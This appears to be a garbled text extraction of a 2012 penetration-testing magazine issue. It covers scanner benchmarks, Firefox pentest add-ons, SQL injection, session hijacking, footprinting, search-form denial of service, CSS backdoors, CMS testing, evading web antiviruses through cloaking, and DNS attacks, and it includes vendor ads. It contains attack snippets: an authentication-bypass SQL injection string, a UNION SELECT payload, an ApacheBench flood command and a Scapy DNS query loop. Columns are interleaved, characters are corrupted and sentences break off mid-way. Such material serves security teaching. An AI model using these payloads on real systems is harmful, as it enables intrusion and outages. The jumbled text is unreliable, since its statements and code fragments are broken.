challenging. life will never be boring again. since there is always something new to learn. applications are never the same. and this is where we start today. but the basics are still correct. T oday we are going to build further on that knowledge and delve deeper in the fantastic world of application security.owasp. It is the right time to protect your website with website security audit and with thorough website security test.com Page 26 . Introduction One of the prominent Information Security consultant and researcher. In fact. all billions of dollars are at risk. Quite ideally therefore cost effective security measures needs to be taken. It goes without saying. A web security testing service will in fact make sure that the company is fully compliant with rules and regulations. The assessment criterion of detecting the accuracy of SQL Injection is one of the most famous exposures and the most commonly implemented attack vector in web application scanners. I n fact more than four out of every five businesses have experienced a data breach still not all business website owners are aware of website security threats or how vulnerable their website is without the necessary protection. This research is only valid for estimating the detection accuracy of SQLi & RXSS exposures. This because a scanner that http://pentestmag. credit card information.html using the project WAVSEP. Shay Chen did not evaluate every possible feature of each product. 01/2012 There are some powerful and free web application security testing tools which can help you to identify any possible holes. This evaluation platform contains a collection of unique vulnerable web pages that can be used to test the various properties of web application scanners. impact of an attack on websites can actually cause costly and embarrassing disruptions in a company’s services. In this article we will explore the choice of tools available. Shay Chen’s Project WAVSEP consists of an evaluation platform which aids in the comparison of 60 Commercial & Open Source Black Box Web Application Vulnerability Scanners. their attempts to get at it are thoroughly assisted by several important factors. And this is where free web application security testing tools comes in. And without employing the web security testing tools business can incur loss. Attackers are lurking everywhere and they are well aware in fact aware of the Web application vulnerabilities. Shay Chen has conducted some extensive testing using these tools and has published a benchmarking report in http://sectooladdict. and for counting and comparing the various features of the tested tools. only the categories tested within the research.OVERALL Open Source Web Application Security Testing Tools Needless to say that with cybercrime is on the rise and with the immense rise in online security threats no business owner should overlook their website’s security and this is exactly where the concept of web application security testing tools have gained immense significance. which might entail moving away from proprietary client/server applications to web applications which are not only cheap but at the same time provides an extensive delivery platform. websites are vulnerable to online security threat and if a website’s server and applications are not protected from security vulnerabilities. Also.c om/2011/08/commercial-web-application-scanner. identities. and is able to respond quickly to any attacks.blogspot. �������������� ������������������ �������������������� ������������� ������������ ��������� ������������ ������� � � � � � � � � � �� ����������������� ���� ������������������������������������ ������ ����������������� �������� ��������� ���������������������� ��������������������� � ���������������� �� ��������������������� ����������������������������� ������������ . com securityservices @ p2sol dot com .393.Security Services : $50. TX 77803 pressing a button! Don’t be fooled by cheap competitor’s products! Tel 939. then masquerading as you.p2sol. so let’s change the rules and let the truth in our advertisement speak for our work. but that is today’s new paradigm. and IT departments: • • • • Penetration Testing Security Assessments Disaster Recovery Special Projects Hacked because someone used password123 as a “temporary” password……. Interested. We could tell you that we offer superior information security services followed by a highly biased list of reasons. the soft copy version of this document contains custom embedded software control codes designed to gain control over your computer. but the point is that skillful social manipulation in conjunction with “embedded software control codes” are the methods used by malicious parties to compromise (gain control of) modern networks. quotes of industry sources. Apologies for the above marketing gimmick.000 $50. For the same reasons that clever marketing can sell an inferior product. Sleep better with our D3tangler™ technology! Our new patent pending D3tangler technology helps you win the evolving Contact: game of IT security. manipulate stock prices using information contained on your system. However.trojacek@p2sol. and maybe you’ll give us the opportunity to let our work speak instead.com 120 N. Periodic reporting of key metrics.000 $400. MAIN BRYAN. your entire network can be hacked. security know how. The technology solves all your security problems by Shohn Trojacek . audit.000 Intrusion Detection System Redundant Firewalls Salaries for IT Security Personnel Gee Whiz Computer Defense Shield A UDI T S U P P O R T Strategic and Technical assessments for audit firms. but it was necessary to grab your attention. experience. Buy buy! Sell Sell!. Sound farfetched? Maybe 5 years ago. and data exercises for your organization analysis to offer real world peer based metrics of your security issues including use of penetration as well as deep dive technical assessments ranging from penetration / tests as a way of providing users an unforgettable technical assessments to strategic reviews. we both know that you know that game.000 Firewall ruined by a lack of cents! • • • • SERVICES AVAILABLE $250. Forgive the fear tactics. PE E R B A SE D E VA L U A TI O N Ongoing comparison against peers of key IT security metrics and controls. U SE R E D UC A TI O N Custom security training We combine software engineering. S T A TI S TI C A L PE N E T R A TI O N Periodic rotation of professional penetration testers against your network via a custom portal complete with the ability to limit the scope and depth of testing according to client needs. or shall you skip to the next page? As a proof in concept. This challenge can only be met with intelligence. and facts to support our assertions.000 $300. starting with one little email.9081 www. machines. Project Managers who does not have more technically strong in web services field. Figure 1. developers. so web is just a term or another name for internet but services provides us connectivity with other users over internet or web. A web service is just a system which resides somewhere on a network and gives response specific requests from clients. it will be easier if you see the Figure 1 which I have sketched out here. Here our web client is looking for a web page www. The main purpose of this article is to give an overview in testing web services. Service-oriented architecture (SOA) and web services are very popular topics in many development projects. A Web service is a communication service or method through which machines (Computers. Mobiles. The basic Web Services platform is XML + HTTP. you can skip all the deeper functionalities about how it works.google. which can publish its function or message to the rest of the world.OVERALL Web Services and Testing The articles listed below provide an overview about web-services and its testing. clients are not only the people working on their computers on the desk. Notebooks.com as you can see in our example. now this request is received by Google web server and it sends the Google webpage to your browser. Here you must be aware about why we are using the term Services. Interaction between web client and google web server 01/2012 Page 36 http://pentestmag. people over internet. and PDA etc) can communicate over the web (internet). This article would be helpful for testers. W eb Services can convert your application into a Web-application. Web Services are just a simple combination of different technologies that allow for making connections between different computers. so just open your browser and put the URL and hit the Enter button. and it can also be some machines. So the basics are simple. It is a great step towards simple access to software and data over the network.com . Here you must be aware of the term clients. html. web browsers like Mozilla Firefox come with the support of add-ons. my IP address changed to 85. The best part about these add-ons is that they enable third-party developers to add new features without interfering with the original source code of the host application. Tor basically has a worldwide network of servers that helps route the internet traffic and thus.OVERALL Ready Your Firefox for Pentesting Although even today web browsers serve the primary purpose of bringing information resources to the user.com Page 44 .20) will automatically open up with a congratulations message that your IP address is now changed.65. Start Tor Browser. penetration testing.238. Pen Testing Add-ons Tor Tor: Experts always suggest that it’s best to hide your identity before getting involved in any security related operations. 01/2012 • WHOIS WHOIS: Internet resources such as domain name. Now. the browser (Firefox 3.en. disguise a user’s geographical location. WHOIS is used to query the http://pentestmag. they no longer represent a software application with bare bones support for just HTML.mozilla. This bundle will will ask your permission to extract a bundle of files to the location where Tor installer was downloaded. and more. which is located in Netherlands. These add-ons are dependent on the services that are provided by the host application to register themselves. IP addresses or controller systems are registered in database systems. Using the privacy and security add-ons from this gallery. third party developers can update their add-ons without making any changes to the host application as the host application operates independently. T hese add-ons when installed inside a browser can add additional functionality to the browser and this additional functionality can be used on the web pages that are viewed by the user. Once you’re connected to the Tor Network. Thus.6. Today.torproject. we can build a good browser based application for penetration testing and security purposes.org/en-US/ firefox/) is a huge repository for add-ons that support Mozilla software like Mozilla Firefox browser.223. These addons are submitted by many developers from across the globe for end-users. which are small installable enhancements to a browser’s foundation. For example. These add-ons can serve for scatterbrained as well as for informative purposes like hacking.org/download/download. Mozilla Firefox Add-ons Mozilla Add-ons (https:// addons. you need to first download the Tor Browser Bundle from Link: https:// www. • To setup Tor. The best thing about Tor is that it’s open-source and anybody can use Tor network for free. Tor allows user to maintain online anonymity. Hovering over the flag will display information such as domain Figure 3. Using this. Flagfox: This extension introduces a flag icon on the right hand side of your address bar (see Figure 1). a malicious user can gain access to the server and can delete or modify records. Metropolitan UK Police. Geotool lookup of a website 01/2012 Page 45 http://pentestmag. Offsec Exploit-db Search: This add-on simply adds Offsec Exploit Archive search among other installed search engines in your Firefox. Nepal Telecommunications Authority. Recently websites like Kathmandu Metropolitan City. assignees.com . This flag shows the web server’s physical location.0 databases for cognizing the data about the resource. Clicking on the flag icon will by default take you to Geotool.name. IP address and server location. This exploit database is a great place for information security researchers and penetration testers for getting an exploit’s information in plain text format. (Add-on Link: https:// addons. registrants and administrative information. Exploit Database Search Figure 1.org/en-US/firefox/addon/offsec-exploitdb-search/). which Flagfox’s default action (see Figure 2) (Add-on Link: https:// addons. You can also add additional lookups which you find necessary. BART Police Database and NASA Forum were exposed of the SQL Figure 2. Right clicking on the flag will let you access additional information about the web site using external lookups such as DomainTools WHOIS. Flagfox in Firefox 6. SQL Injection SQL Injection: Database applications are critical in today’s web scenario.org/en-US/firefox/addon/flagfox/). WOT Scorecard. If a database application is unable to filter out escape characters then it becomes very easy for malicious users to perform SQL code injection on a vulnerable application.com/) is an archive of more than 15000 exploits and software vulnerabilities. McAfee SiteAdvisor and many more.mozilla. Vidalia Control Panel Exploit Database Search: The Exploit Database (http:// exploit-db.mozilla. Access Vulnerability Cross-site scripting Cross-site scripting (XSS): XSS vulnerability is usually found in web applications. vulnerable=true). EC Council and Samba Web Administration Tool (SWAT) were exposed of the XSS vulnerability.com (MAPS). (Add-on Link: https://addons. you can test this add-on by clicking the ‘Test all forms with all attacks’ buttons in the sidebar to test that particular page (see Figure 5). XSS Me 0.org/enUS/firefox/addon/sql-inject-me/). This add-on will test a website for SQL injection vulnerabilities by substituting HTML form values with crafted database escape strings that are used in an SQL injection attack. Access Me 0. just like a web vulnerability scanner.org/en-US/firefox/ addon/xss-me/).4: This tool works in the same way as SQL Inject Me. This add-on shows the resulting HTML page as vulnerable only when JavaScript value (document.5: This add-on comes from a leading information security firm-Security Compass.2. This add-on detects reflected XSS vulnerabilities and points out the possible entry points for an attack.com . Although this extension will not try to expose the security of a website. Google Appspot. Forbes. XSS Me comes from SecCom Labs. The malicious user gets access to the file by specifically requesting its name by using a non-standard URL for bypassing the file access controls of the server. SQL injection plays an important part in any pen testing routine.4: Web applications affected by access vulnerability are tested with four different methods.4. (Add-on Link: https://addons. This enables him to steal sensitive information from client’s account. SQL Inject Me 0. the user can only read or copy the file from the computer. it’ll look for database error messages in the page. this extension will enumerate the possible entry points without intruding into the system. Figure 6. Thus. a malicious user crafts a URL of a vulnerable website in such a way that when the malicious code is executed then client’s session cookie is sent to the malicious user. The crafted malicious link can easily embedded a HTML document inside a frame using inline HTML frame tag Access Vulnerability: Web servers can sometimes be affected by file access vulnerability where a malicious user uses a mere web browser to get unauthorized access to the files stored on the server. Offsec Exploit Archive Search injection vulnerability. In this attack. Access Me Test Summary 01/2012 Page 46 http://pentestmag. • • To use this add-on you need to go to Tools > SQL Inject ME > Open SQL Inject Me Sidebar. Offsec Exploit Archive Search Figure 7. Recently websites like Bing. This vulnerability doesn’t allow the malicious user to delete.mozilla.4.mozilla. File access requests are sent by using session Figure 5. modify or create a file.OVERALL Figure 4. XSS Me Test Results <iframe>…</iframe>. Hence. Once you’re at a login page or on a HTML form. 7. user agent spoofing is done by web scrapers and spam bots for forcing certain server side contents to show up by hiding the browser’s identity. Figure 10.0. OS.5. You can track and modify HTTP(S) headers. Click Start Tamper from the top menu to start tampering with the HTTP(S) requests. and software version. Search Robots (Googlebot 2. HTTP HEAD verb (retrieve whatever information in the form of an entity without returning a message-body in the response). Basically you put a link in the hackbar and then you have to select various suitable options from the drop down menu and then just Figure 9. Tamper Data Tamper Data 11.3: This add-on by Chris Pederick helps change your browser’s user agent string to Internet Explorer. Hackbar Hackbar: Hackbar 1.6. User agents strings store information like type of application. string reverse. This user agent string is detected by websites for adjusting the page design layout. Android browser uses HTML rendering engine – WebKit (KHTML) and so Android browser pretends to be Safari. insertion of Lorem Ipsum text.1. Hackbar Figure 11. Hackbar also has an encoder-decoder which can perform Base64/URL/HEX encoding and decoding.mozilla. and a combination of session and HEAD/SECCOM. SQL and XSS options of this add-on will help you add statements into your URL. This add-on will allow you to intercept the HTTP(S) traffic between your computer and the Internet.3.1 is a simple but powerful penetration and security audit tool. SHA-256 or ROT13 hash format. • Once you install Tamper Data. Tamper with request 01/2012 Page 47 http://pentestmag. like for example clicking on Union Select Statement under SQL will give the output: UNION SELECT 1. Hackbar is capable of encrypting a text or link to its MD5. The log will start showing you all the subsequent requests after you start tampering. The other amusing uses are viz.7. This will open a log window.10.. SECCOM verb.1. (Add-on Link: https://addons. User Agent Switcher 0.org/en-US/firefox/ addon/user-agent-switcher/). and Yahoo Slup) or iPhone 3.6.0.org/en-US/firefox/addon/hackbar/). fibonacci series and more. User Agent Switcher Menu removed method. Msnbot 1. (Add-on Link: https:// addons.9. (Add-on Link: https://addons. For example. (Add-on Link: https://addons.mozilla. POST and GET request parameters. Hence. To see details of a request you need to select the item and double click it to see details of a request header.mozilla.org/ en-US/firefox/addon/tamper-data/).org/en-US/firefox/addon/ access-me/). execute the edited URL.4. To access User Agent Switcher go to Tools > Default User Agent.com . SHA-1.8.1: Tamper data can effectively be used for testing web based applications. go to Tools > Tamper Data. Tamper Data Log Window User Agent User Agent: User agent is basically a client side application like web browser or search engine crawlers.Figure 8.2.mozilla. (Add-on Link: https://addons. thus. the add-ons stays with the browser and you don’t need to install them every time you change systems. the add-on can backup and restore all or selected cookies. Please remember the fact that you can only edit cookies from your current session.20) was used because most add-ons are compatible with this version and not with the latest 6.0 or 7. then you can modify that item’s parameters like protocol. host. He can be reached out at:
[email protected]. The edited cookies can be saved as new entries or can replace the old entries. path and you can then click OK to see the URI getting replayed with the modified details that you entered. DHANANJAY D. An older version of Firefox (Firefox 3.org/en-US/firefox/ addon/cookies-manager-plus/). one should also understand that there are a lot of alternate add-ons available for doing the same XSS.OVERALL Cookies Manager+ Cookies Manager+ 1. It is quite simple for a pen tester to make a good pen testing application from a freely available browser like Firefox. SQL Injection or HTTP requests modify / replay. he often writes on topics related to computer sciences. path and name of multiple cookies. Figure 12. the number of add-ons that are available for the Firefox community is in large numbers. a pop-up prompts you to – tamper the request. He holds a diploma in Cyber Law and Information Security & Ethical Hacking.0b1 versions of the browser. Also. As a freelance writer. once you install all your important add-ons on the browser that is used by Tor Browser Bundle. These parameters show up in the tamper window. Cookies Manager+ 01/2012 Page 48 http://pentestmag.com .com. Selecting tamper will show you a tamper window where you can edit the data using the context fields. u ER. port. He has written articles for journals like PenTest Magazine.1: This add-on can edit domain. submit it without tampering or abort the request. GARG The author holds a Bachelor’s Degree in Electronics & Telecommunication. after that you can submit the modified values. The Firefox project was released back on November 9. which allows you to modify by adding SQL Injection/XSS text to the username/email and password fields. Due to the large number of add-ons available for Firefox. credentials. This makes it a lot easier for even beginners to use third party add-ons for converting their browsers to something as strong as a hacking application. Tamper Data Context Field Modify Window Conclusion • • If you right click an item and select Replay in browser.5.mozilla. When a request is made through your browser. 2004. Data Center Magazine and Enterprise IT Security Magazine. once the session ends. Tamper data is particularly useful when username and password parameters are passed through an HTTPS request. Apart from this. doesn’t store any history logs and you can relocate the browser and Tor to any computer you like without installing anything. Figure 13. the cookies will expire because we are using the bundled Firefox browser that came with Tor. He likes working on projects related to information security. In the beginning we used Tor Browser Bundle because it’s portable. export cookie information onto your clipboard and automatically monitor cookies changes. �������������� ������������������� ������������������������� ������������������������������������������������������������������������������������������ ���������������������������������������������������������������������������������������������� ���������������������������������������������������������������������������������� �������������������������������������������������������������������������������������������������� � � � � � � ����������������������������������������������������������������������������������������� � ������������������������������������������� ������������������������������������������������������������������������������ � ����������������������������� �������������������������������������������������������������������������������� � ����������������������������� ����������������������������������������������������������������������������������������������� ������������������������������������������������������������������������������������� ����������������������������������������������������������������������������������������������������������������������������������������������������������������������� . SQL injection. To understand these commands more fully it is important to understand the TCP/IP handshake process. W e will look at each of these vulnerabilities from the outside as an attacker would as well as inside the source code where they reside and your developers program them. I believe this is important when doing a penetration test to get a full threat picture of the application that you are looking at. SQL injection at its most basic level is mixing code and database commands to extract.php/Category:OWASP_WebScarab_Project Or Tamper data https://addons. Another point to bring up is the earlier that this is completed in the software development life cycle the cheaper it is to fix as well as lower attack surface your application has. Cookies often times store state data as well as authentication and tracking data that may or not be sensitive. Cross Site Scripting and Cross Site Request Forgery.org/ index.com/sql-injectioncheatsheet-oku/). One of the simplest SQL injection attacks to bypass authentication is ‘ or 1=1-(Pasted from http://ferruh. . We will then offer solutions on how to fix them and offer more secure software to your enterprise. http:// portswigger. SQL injection can allow an attacker to bypass login functions or extract data.mavituna.com Page 50 . 01/2012 With a proxy tool like Burpe Suite. TCP/IP is a stateless protocol sending response and requests through GET. This article will discuss the three most common and devastating software security vulnerabilities. modify or delete data in the database. Cross Site Scripting and Cross Site Request Forgery work. Many of my colleagues participate in black box testing rather than white box testing.OVERALL Web Application Security Vulnerabilities Have Been Prevalent The Last Decade Port 80 and Port 443 has been a great attack vector for malicious attackers. The purpose of this article is to discuss white box testing or having full knowledge of the source code and how the application works. Black box testing is also known as zero knowledge testing where the testing team is provided no knowledge of the resource to be tested and has to acquire information on its own.owasp. SQL injection is a web application security attack that can be devastating to an application. For this basic understanding now we can completely understand how SQL Injection. Open Web Application Security Framework Web Scarab https://www. The source code for this would look something like this. PHP or any language that you chose is that the value of the USER is not validated and the http://pentestmag.mozilla.NET. POSTS and HEAD.org/en-US/firefox/ addon/tamper-data/ all client side validation can be bypassed and direct commands can take place on the server through a man in the middle proxy.net/burp/. Select * From User Where The problem with this code snippet whether it be in Java. . . allows a user to take control over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. the attacker can masquerade as that user and do anything the user is authorized to do on the network. When implemented successfully. The attacker’s target might be your session.com . For most communications. The session ID is normally stored within a cookie or URL. enjoying the same access to resources as the compromised user. depending on the user’s level of technical knowledge and the nature of the attack. The most useful method depends on a token the Web Server sends to the client browser after a successful client Figure 1. If a web site does not respond in the normal or expected way to user input or stops responding altogether for an unknown reason. Session hijacking takes advantage of that practice by intruding in real time. Because http communication uses many different TCP connections. The intrusion may or may not be detectable.ATTACK Session Hijacking Even if you were drunk and surfing at a Wi-Fi hotspot. you probably wouldn’t stand up and shout your username and password for anyone who might want it. attackers assume the identity of the compromised user. In particular. session hijacking is a possible cause. the web server needs a method 01/2012 to recognize every user’s connections. Session ID Page 62 http://pentestmag. authentication procedures are carried out at set up. also known as TCP session hijacking. Once the user’s session ID has been accessed (through session prediction). it is used to refer to the theft of a cookies used to authenticate a user to a remote server. But an attacker does not need to find out your username and password. during a session. S ession hijacking is the exploitation of a valid user session to gain unauthorized access to information or services in a computer system. Session hijacking. . Firstly. Robtex. if you are up for it and have physical access to the target. who does it for them. All these become very useful when selecting targets. a single tool will not have access to all the disparate information sources that one should consult. that one old IIS 5 webserver that is not used.. Dumpster diving. For any organization that must publish regular reports (e. what community or charity work they are involved in. but not powered off. but the information could change tomorrow as new sites are brought online. data provides the best current view of the target. While the temptation exists to merely feed a domainname into a tool or script and take the output as your completed footprint. tips and tricks that pentesters and hackers alike use when starting on a engagement. and the results are combined with all discovered information. What they do. means sifting through trash to get useful information. This will give you and insight into what type of network/infrastructure you can expect. Thus as a datum is found that could expand the footprint. but in recent times social media can provide us with even more. Sites like LinkedIn. listed companies). these are a treasure trove of information for understanding the target’s core business units. A basic footprining methodology covers reconnaisance.g. instead. corporate hierarchy and lines of business. By following a methodology. to be easily applied in a general fashion across a broad range of targets.ATTACK Finding your Target. network registration information and active steps such as SSL host enumeration. or old sites are taken offline.. and secondly the footprinting process is inherently iterative and continous. perhaps. the first active step in the recognisance phase of an external network security engagement. various information services (e. footprinting is also one of the most enjoyable parts of my job as I attempt to outperform the automatons. DNS mining. a new iteration of the footprinting process triggers with that datum as the seed. A footprint is almost never complete. A s a security analyst. whois.com Page 72 . Network foot printing is. Facebook and Twitter can provide you with lists of http://pentestmag. a fork of the footprint 01/2012 The very first thing to do is to get to know your target organization. financial reports and any other documents published on or by the organization might also yield interesting results. Know your target Approach As with most things in life having a good approach to a problem will yield better results and overtime as your approach is refined you will consume less time while getting better results. it is all about finding that one target that everybody forgot about or did not even know they had. your footprinting will become more repeatable and thus reliable. at first glance.g. With this article I am going to share some of the steps. where they do it from both online and in the kinetic world. who they do it for. this will not yield a passable footprint for two reasons. routes). Reading public announcements. This phase is often highly automated with little human interaction as the techniques appear. 128 [ms] (mean. increase the application server’s response time if you find a good way to the increase the amount of database results. Especially. across all concurrent requests) 2104. score. But even the simple search queries.780 [ms] (mean. Bank money transfer feature of the applications will create complex (containing more than one keyword like bank account. Simple search (space. increase the application server’s response time if you find a good way to the increase the amount of database results. period etc. But even the simple search queries. across all concurrent requests) 2151. Simple search (space. the attacks with wildcard queries or the attacks using the maximum number of database search results can cause an outage on the target application. Advanced search 01/2012 Page 76 http://pentestmag.369 [ms] (mean. etc.) is not as effective as wildcard attacks. Many of today’s applications have prevention against attack vectors like wildcards queries. and these forms also leave open doors to DoS attacks. It will be a good Listing 1. money. only one character. But this still does not mean that they are not exposed to Denial of Service attacks. across all concurrent requests) 3368. across all concurrent requests) 2577. you can change presentation.) is not as effective as wildcard attacks. across all concurrent requests) 2455.ATTACK Search Form Based DoS Many of today’s applications have prevention against attack vectors like wildcards queries.com/ 00:10:16 00:10:19 00:10:22 00:10:26 00:10:29 00:10:35 00:10:38 2162.925 [ms] (mean. With this in mind.250 [ms] (mean. only one character. XSS etc) which can be found during the penetration tests. across all concurrent requests) Figure 1.bank. etc. But this still does not mean that they are not exposed to Denial of Service attacks. S earch forms can include common attack vectors (SQL. bunyamin@symturk [bunyamin@symturk]# ab -n 1 -c 1 -f ALL http:// www.com . There is a good advanced search form in our target web application as you can see at below.078 [ms] (mean.905 [ms] (mean. credit) queries and as a result of these complex queries the number of results will be greatly increased. across all concurrent requests) 4132. the Advanced Search Figure 2. With HTML5 and CSS3. which is by default used for serving Apache threads. where he or she can sometimes do almost the same on the system as any other user. I’m not even sure that I’ve collected most of the known possible ways. S o it wouldn’t be smart to block that user from the system as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead. I discovered a couple of persistent (stored) Cross-Site Scripting vulnerabilities in vBulletin [1] [2]. but after reading through RSnake’s XSS Cheatsheet [3]. and while searching through the Internet I came up with a nice list as seen in Listing 2.ATTACK CSS Backdoors Hiding Malicious Payloads Inside Cascading Style Sheets When a website gets compromised a new file is often created by the attacker. could hide a JavaScript payload in one of the CSS files. which are essentially the same as they are loaded with the HTML page. but as I dived deeper into executing JavaScript via CSS (Cascading Style Sheets). where most. where the latter is the most important in this case. or black hats. I realized at that time.. it’s important to know how it is possible to even execute JavaScript inside the templates or files. Screenshot of JavaScript execution inside a CSS �le on vBulletin Firstly. are mentioned at RSnake’s website. As you can see. But how is it possible? (Check Listing 1) In fact. http://pentestmag. new vectors enabling JavaScript will most likely be possible. if not all of them.com 01/2012 Page 78 . where the first was simply found with standard research but also a bit of luck [4] [5]. There are of course limitations to these backdoors. that attackers. as the page may not load the entire CSS library at once and therefore. vBulletin uses e.g. such as knowledgeable script kiddies. over 100 CSS files for each style. an unaware administrator may not realize his or her installation of vBulletin has been compromised as they may be unaware of backdoors can hide in CSS. while RSnake’s XSS Cheatsheet [3] was used to aid me in bypassing the custom Anti-XSS filter inside vBulletin. On Linux the user used to help the attacker is www-data. How to execute JavaScript in CSS Figure 1. the most appropriate CSS file for infection must be chosen. Sometime ago. and if the CSS changes are stored only inside the database. All of this was great. these are just some of the ways. . when a user installed CMS is complete. customization of the theme. The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content. In this article. click and click. Identify the web First thing we must know before pentesting the website is what CMS was used? Because each CMS has different default files or structure.253. he can then hack all websites that used the vulnerable CMS or vulnerable plugin too. I will discuss how to pentest 3 well-known CMS: Joomla. Those files will be the signature of the CMS and default configurations will let us know what CMS was used. he often forgets to remove unnecessary files from the website. he can still create a beautiful or nice websites because CMS is managed via a web interface. Anybody can be an owner of a website today very easily.168.128/3/wp-login. We can analyze the target website with the following 2 methods. Although. etc.168. This tutorial will show you how to get the information for the common CMS websites and how to pentest them. the bad side is if someone can find a vulnerability in the core of the CMS or well-known plugin.ATTACK How to pentest well-known CMS Today.253. Drupal and Wordpress. user management. By manual testing Normally. the web master does not understand anything about web programming.128/1/administrator/) Figure 2. All these different things create the signature of each CMS. The coin has 2 sides. different colors. T hese entire websites are created with the same CMS. administration website.com . Example administrator page of Joomla (http:// 192. Most new websites have the same look. The web master can add a new feature to CMS by installing a new plugin.php) 01/2012 Page 82 http://pentestmag. a new website is created about every minute. A web master just has to click. only difference is the logo of the website. then valla! the new website has been created. Example administrator page of Wordpress (http:// 192.page structure. Figure 1. com/pen .�������������������������� ���������������������� CloudPassage Halo is the award-winning cloud server security platform with all the security functions you need to safely deploy servers in public and hybrid clouds. cloudpassage. Halo is FREE for up to 25 servers. Particularly I saw checking of Referer (and similar approach can be used for User-Agent). Yahoo. Which can be concerned with the desire to improve their system for searching viruses at web sites – so with using of cloaking (UA spoofing is type of it) to decloak viruses at web sites. because they are using bots of search engines with known user agents. Particularly from search engines 01/2012 with built-in antivirus systems. In my research I have examined different systems for searching of viruses at web sites. Example: in May 2010 many web sites on sharedhosting at DreamHost and other hosting providers were hacked and infected with malicious code. And these method of protection of malicious code from systems for searching of viruses create serious challenge for these systems. McAfee SiteAdvisor. When User Agent is analyzing and if it’s a search engine. as built-in the search engines – these systems can be called as web antiviruses. then malicious code is not shown. So the same cloaking which used for SEO. including search engines with built-in antiviruses.com Page 86 . Yandex. In this article I’ll describe methods of bypassing of web antiviruses. Bypassing systems for searching of viruses at web sites is possible with using of cloaking (which is known from 90s and is used for hiding from search engines bots for SEO purposes).ATTACK Bypassing Web Antiviruses At beginning of April 2010 I’ve made the testing of systems for searching of viruses at web sites [1]. which developers of such system need to take into account to prevent possibilities of malware to hide from them. And every web antivirus can face with malware’s attempts to hide from it (so malware will left undetected and continue to infect visitors of web sites). And later I have presented my results of testing of web antiviruses on conference UISG and ISACA Kiev Chapter #6 [2]. This concerns all systems for searching of viruses at web sites. I saw the using of cloaking method in malicious scripts many times during my researches since 2008. Antivirus companies and other security researchers are also sometimes finding cases of using cloaking against search engines with built-in antiviruses. But it uses spoofing ineffectively and with considered use of cloaking the malware can effectively hide from http://pentestmag. I ’ve examined the next web antiviruses: Web Virus Detection System. if it’s a browser – then shown. Effective use of cloaking against web antiviruses In the end of August 2011 I’ve found that Google started using User-Agent spoofing for its bots. as standalone. and the code for distributing of malware was using a cloaking for hiding itself from built-in antiviruses in search engines Google and Yahoo. can be used for malware spreading and hiding from systems for searching of viruses at web sites. which have no counter-measures against it. Bypassing of systems for searching viruses at web sites In May 2010 I’ve published the article to The Web Security Mailing List Archives [3] about bypassing systems for searching of viruses at web sites. Google. Norton Safe Web. StopBadware. Use 1 to demand recursion. Domain name system 01/2012 Page 88 http://pentestmag. he is considered the inventor of DNS. and specifies that the responding name server is an authority for the domain name in question. DNS listens on port 53 where UDP is used to resolves domain names to IP addresses and vice versa. or a response (1). This identifier is copied to the corresponding reply and can be used by the requester to match up replies to outstanding queries. This bit is used to report whether or not the response you receive is authoritative. ARPAnet. It is estimated that 20% of total Internet traffic amount is DNS traffic.ATTACK How to Successfully Attack DNS? DNS is a very attractive to attack as very often IT administrators forget to implement measures to secure DNS service. Figure 1. It can also enlist TCP on the same port for zone transfer of full name record databases. D NS was proposed by Paul Mockapetris in 1983 (in RFC’s 882 and 883). The values have the following interpretation: 0 – No error condition 1 – Format error – The name server was unable to interpret the query. TC TrunCation – specifies that this message was truncated. QR – A one bit field that specifies whether this message is a query (0). RA Recursion Available – this be is set or cleared in a response.com . RCODE Response code – this 4 bit field is set as part of responses. and denotes whether recursive query support is available in the name server. RD Recursion Desired – this bit directs the name server to pursue the query recursively. Recursive query support is optional. Together with Jon Postel. 2 – Server failure – The name server was unable to process this query due to a problem with the name server. as a distributed and dynamic database – as opposed to the single table on a single host that was used by the earlier version of the internet. AA Authoritative Answer – this bit is only meaningful in responses. Structure of a DNS packet ID – A 16 bit identifier assigned by the program that generates any kind of query. OPCODE – A four bit field that specifies kind of query in this message. Z – Reserved for future use. Listing 1. Output Welcome to Scapy (2.2.0) >>>top_level = ".rs" >>>cnt = 1000 >>> >>>domain = "example" >>>dns_server = "10.123.11.2" >>>for i in range(0, cnt): ... s1 =s.lower() ... print i ,q Received 2 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=115 id=27939 flags=DF frag=0L ttl=126 proto=udpchksum=0x59e8 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=3015 len=95 chksum=0x21d4 |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=name-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='ponlj.example.rs.' qtype=A qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN ttl=900 3 xx.example.rs Begin emission: * ... s = RandString(RandNum(1,8)) ... q = s1+"."+domain+top_level ... sr1(IP(dst=dns_server)/UDP(sport=RandShort())/DNS( ... rd=1,qd=DNSQR(qname=q))) Finished to send 1 packets. Received 1 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=112 id=27941 flags=DF frag=0L ttl=126 proto=udpchksum=0x59e9 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=56637 len=92 chksum=0xd320 0 2dat.example.rs Begin emission: ..* .Finished to send 1 packets. Received 4 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=114 id=27935 flags=DF frag=0L ttl=126 proto=udpchksum=0x59ed src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=10385 len=94 chksum=0x21ac |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=n ame-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='2dat.example.rs.' qtype=A qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x19\nhostmaster\xc0/ x00*0' |>ar=None |>>> w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\x00$\xea\x00\x00\ 1 e0qysndm.example.rs Begin emission: * |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=name-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='xx.example.rs.' qtype=A rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x17\ x00$\xea\x00\x00\x00*0' |>ar=None |>>> 4 6348lzwk.example.rs Begin emission: qclass=IN |> an=None 